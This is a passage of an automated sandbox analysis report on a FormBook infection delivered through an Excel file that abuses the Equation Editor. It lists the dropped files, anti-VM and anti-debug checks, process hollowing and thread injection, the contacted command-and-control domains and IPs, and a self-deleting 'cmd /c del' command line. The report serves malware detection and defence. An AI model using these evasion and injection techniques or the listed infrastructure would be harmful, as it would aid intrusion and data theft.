Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.500818084.0000000000B00000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.465519342.0000000000230000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.466461493.0000000000440000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.500693233.0000000000980000.00000040.00000001.sdmp, wscript.exe, wscript.exe, 00000007.00000002.669177036.00000000023F0000.00000040.00000001.sdmp, wscript.exe, 00000007.00000003.501482698.00000000020E0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.668606015.0000000002270000.00000040.00000001.sdmp, wscript.exe, 00000007.00000003.500502005.0000000001F80000.00000004.00000001.sdmp
Source: Binary string: wscript.pdb source: vbc.exe, 00000005.00000002.501191529.00000000023A0000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.500645492.0000000000899000.00000004.00000020.sdmp
Source: Binary string: wscript.pdbN source: vbc.exe, 00000005.00000002.501191529.00000000023A0000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.500645492.0000000000899000.00000004.00000020.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10009565 push ecx; ret 4_2_10009578
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8C9 push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8C9 push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00416187 push fs; iretd 5_2_00416195
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041630B push es; retf 5_2_0041630C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CD66 push esp; ret 5_2_0041CD67
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CE96 push ds; ret 5_2_0041CEA1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099DFA1 push ecx; ret 5_2_0099DFB4
Source: C:\Users\Public\vbc.exe Code function: 5_1_00416187 push fs; iretd 5_1_00416195
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041630B push es; retf 5_1_0041630C
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B7E5 push eax; ret 5_1_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B832 push eax; ret 5_1_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B83B push eax; ret 5_1_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B8C9 push eax; ret 5_1_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B8C9 push eax; ret 5_1_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B89C push eax; ret 5_1_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CD66 push esp; ret 5_1_0041CD67
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CE96 push ds; ret 5_1_0041CEA1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0228DFA1 push ecx; ret 7_2_0228DFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00086187 push fs; iretd 7_2_00086195
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008630B push es; retf 7_2_0008630C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008B7E5 push eax; ret 7_2_0008B838
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008B83B push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008B832 push eax; ret 7_2_0008B838
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008B89C push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008B8C9 push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0008B8C9 push eax; ret 7_2_0008B8A2
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_00405C49

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsv6C8A.tmp\gqsrfnlttu.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000078614 second address: 000000000007861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000000789AE second address: 00000000000789B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2588 Thread sleep time: -360000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_00405250
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C22 FindFirstFileA,FindClose, 4_2_00405C22
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402630 FindFirstFileA, 4_2_00402630
Source: explorer.exe, 00000006.00000000.481600998.000000000449C000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.481600998.000000000449C000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Z
Source: explorer.exe, 00000006.00000000.481785766.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.465719078.0000000000514000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.471205688.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.545250826.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.472862187.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10008C35 IsDebuggerPresent, 4_2_10008C35
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000B0F0 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_1000B0F0
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress, 4_2_00405C49
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10001000 GetProcessHeap,HeapAlloc,GetUserDefaultLCID, 4_2_10001000
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A26F8 mov eax, dword ptr fs:[00000030h] 5_2_009A26F8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_022926F8 mov eax, dword ptr fs:[00000030h] 7_2_022926F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\Public\vbc.exe Code function: 4_2_10006D79 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_10006D79

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.trendyhunterr.com
Source: C:\Windows\explorer.exe Domain query: www.flagimir.store
Source: C:\Windows\explorer.exe Domain query: www.gzz06j.cloud
Source: C:\Windows\explorer.exe Network Connect: 45.139.238.65 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.130.41.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.14d7.com
Source: C:\Windows\explorer.exe Network Connect: 154.23.172.42 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 660000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe" Jump to behavior
Source: explorer.exe, 00000006.00000000.545376662.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.486116803.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.469127632.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478720439.0000000000750000.00000002.00020000.sdmp, wscript.exe, 00000007.00000002.668238422.0000000000880000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.545376662.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.486116803.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.469127632.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478720439.0000000000750000.00000002.00020000.sdmp, wscript.exe, 00000007.00000002.668238422.0000000000880000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.545376662.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.486116803.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.469127632.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478720439.0000000000750000.00000002.00020000.sdmp, wscript.exe, 00000007.00000002.668238422.0000000000880000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10005A54 cpuid 4_2_10005A54
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 4_2_0040594D

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs